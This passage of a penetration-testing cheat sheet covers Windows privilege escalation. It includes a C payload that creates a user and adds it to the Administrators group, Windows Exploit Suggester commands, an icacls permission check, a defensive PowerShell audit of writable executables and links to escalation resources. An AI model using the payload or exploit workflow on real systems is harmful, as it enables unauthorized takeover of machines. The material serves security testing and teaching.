• Check file permissions via icacls and see whether the file is writable for Everyone:

        icacls <filename>

  • C code to add a new user to the Administrators group:

        /* add a new user to the administrators group */
        /* compile with mingw32: */
        /*   i586-mingw32msvc-gcc -o useradd_win useradd_win.c */
        #include <stdlib.h> /* system, NULL, EXIT_FAILURE */

        int main(void)
        {
            /* create the account; stop if the first command fails */
            if (system("net user <username> <password> /add") != 0)
                return EXIT_FAILURE;
            /* add the new account to the local Administrators group */
            if (system("net localgroup administrators <username> /add") != 0)
                return EXIT_FAILURE;
            return 0;
        }

  • Windows Exploit Suggester:
    • Get sysinfo from Windows:

          systeminfo > sys.info

    • Upload the sys.info file to your Linux machine
    • Update the Exploit Suggester's database:

          python windows-exploit-suggester.py -u

    • Execute it against the collected system info:

          python windows-exploit-suggester.py -d <databasefile> -i <sysinfofile>
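The icacls check above is written for one file at a time. The PowerShell script below is an added example (not code from the original page or from any of the linked projects) that performs the same check in bulk from an auditing standpoint: it walks a directory tree and reports executables, libraries and scripts whose ACL grants write-type rights to broad principals such as Everyone or BUILTIN\Users, which is the misconfiguration the check is looking for. The root path, the extension list and the principal list are assumptions; adjust them to the directories and groups relevant to the host being reviewed.

```powershell
# Added example: audit a directory tree for executables that broad principals can modify.
# The defaults below are assumptions, not values from the original page.
param(
    [string]$Root = 'C:\Program Files',                 # assumed starting directory
    [string[]]$Extensions = @('.exe', '.dll', '.bat', '.ps1')  # assumed file types of interest
)

# Principals whose write access on program files usually indicates a misconfiguration
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow the file to be changed, replaced, or have its ACL rewritten
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions

Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $Extensions -contains $_.Extension.ToLower() } |
    ForEach-Object {
        $file = $_
        # Skip files whose ACL cannot be read with the current privileges
        try { $acl = Get-Acl -Path $file.FullName -ErrorAction Stop } catch { return }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            if ($broadPrincipals -notcontains $who) { continue }
            # Report only ACEs that carry at least one write-type right
            if (($ace.FileSystemRights -band $writeMask) -ne 0) {
                [pscustomobject]@{
                    Path      = $file.FullName
                    Principal = $who
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    } | Format-Table -AutoSize
```

Every row in the output corresponds to what `icacls <filename>` would show as `(F)`, `(M)`, `(W)` or a similar write grant for that principal. Two caveats when reading the results: generic rights (`GENERIC_WRITE`, `GENERIC_ALL`) appear in `FileSystemRights` as large negative numbers rather than named flags and are worth treating as writable, and an inherited ACE points to a misconfigured parent directory rather than to the file itself, so the fix belongs on the directory.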

Windows Privilege Escalation

  1. http://www.fuzzysecurity.com/tutorials/16.html
  2. https://toshellandback.com/2015/11/24/ms-priv-esc/
  3. https://github.com/pentestmonkey/windows-privesc-check
  4. https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
  5. https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  6. https://github.com/foxglovesec/RottenPotato
  7. http://www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet/
  8. https://www.youtube.com/watch?v=PC_iMqiuIRQ
  9. https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be
  10. https://github.com/PowerShellMafia/PowerSploit
  11. http://www.blackhillsinfosec.com/?p=5824
  12. https://www.commonexploits.com/unquoted-service-paths/
  13. https://github.com/abatchy17/WindowsExploits